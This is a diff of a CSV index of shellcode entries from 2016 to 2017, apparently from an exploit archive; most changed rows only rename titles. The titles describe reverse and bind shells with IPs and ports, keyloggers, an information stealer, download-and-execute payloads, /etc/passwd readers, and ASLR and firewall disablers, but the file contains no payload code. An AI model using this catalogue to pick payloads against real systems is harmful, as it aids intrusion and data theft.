+39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 -39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 +39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 -39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 +39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 -39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 -39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 +39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 +39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Execve-Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 -39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0 +39496,platforms/arm/shellcode/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,arm,shellcode,0 39519,platforms/win_x86/shellcode/39519.c,"Windows x86 - Download File + Run via WebDAV Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win_x86,shellcode,0 39578,platforms/lin_x86-64/shellcode/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0 39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 -39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - Bind 5600/TCP Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0 +39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0 -39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - Bind 5600/TCP Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 +39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 -39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind 1472/TCP Shell (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 +39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 +39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39728,platforms/generator/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",generator,shellcode,0 39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0 -39754,platforms/win_x86/shellcode/39754.txt,"Win32 .Net Framework - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0 -39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP Shell (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 +39754,platforms/win_x86/shellcode/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0 +39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 +39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0 -39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bind Shell 1234/TCP (Configurable Port) Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0 +39815,platforms/generator/shellcode/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,generator,shellcode,0 39844,platforms/lin_x86-64/shellcode/39844.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 -39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - execve (XOR Encoded) Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0 +39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 +39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 +39885,platforms/multiple/shellcode/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0 39900,platforms/win_x86/shellcode/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -39901,platforms/lin_x86/shellcode/39901.c,"Linux/x86 - Bind Shell /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)",2016-06-07,sajith,lin_x86,shellcode,0 +39901,platforms/lin_x86/shellcode/39901.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)",2016-06-07,sajith,lin_x86,shellcode,0 39914,platforms/win_x86/shellcode/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 39979,platforms/windows/shellcode/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,windows,shellcode,0 40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -40026,platforms/lin_x86/shellcode/40026.txt,"Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",lin_x86,shellcode,0 -40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 -40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 -40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Bind Ncat (4442/TCP) Shell / SSL / Multi-Channel (4444/TCP-4447/TCP) / Persistant / Fork / IPv4/6 / Password Shellcode (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 -40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shell (192.168.227.129:4444) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0 -40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0 +40026,platforms/lin_x86/shellcode/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",lin_x86,shellcode,0 +40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 +40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 +40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 +40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 +40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP /bin/sj Shell (192.168.227.129:4444) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0 +40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 -40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell / Syscall Persistent / Multi-Terminal (4444/TCP-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 -40128,platforms/linux_crisv32/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,linux_crisv32,shellcode,0 +40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 +40128,platforms/linux_crisv32/shellcode/40128.c,"Linux/CRISv32 - Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)",2016-07-20,bashis,linux_crisv32,shellcode,0 40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0 40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat 98/TCP + UDP Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0 -40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 -40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse TCP ZSH (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 +40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0 +40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 +40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 +40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0 40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 -40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0 +40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0 40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download File + Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 -40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0 -40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0 +40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0 +40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0 40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0 -41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0 +41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0 41183,platforms/linux/shellcode/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0 -41220,platforms/linux/shellcode/41220.c,"Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (Genearator) (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0 -41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 -41375,platforms/linux/shellcode/41375.c,"Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 +41220,platforms/generator/shellcode/41220.c,"Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,generator,shellcode,0 +41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 +41375,platforms/linux/shellcode/41375.c,"Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 -41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0 +41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0 41439,platforms/lin_x86-64/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode,0 -41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0 +41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0 41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 -41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 +41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 -41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Polymorphic Shell (127.0.0.1:1234) Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 +41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0 -41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0 +41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind TCP /bin/sh Random Port Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - File Reader Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0 -42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0 -41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0 +42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0 +41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0 41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0 41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(_/bin/sh_) Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0 41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0 41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0 41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0 -41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0 -41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Shellcode (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0 +41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0 +41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0 42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0 -42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0 -42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - execve(/bin/sh) setuid(0) setgid(0) (XOR Encoded) Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0 +42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0 +42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0 42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0 -42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 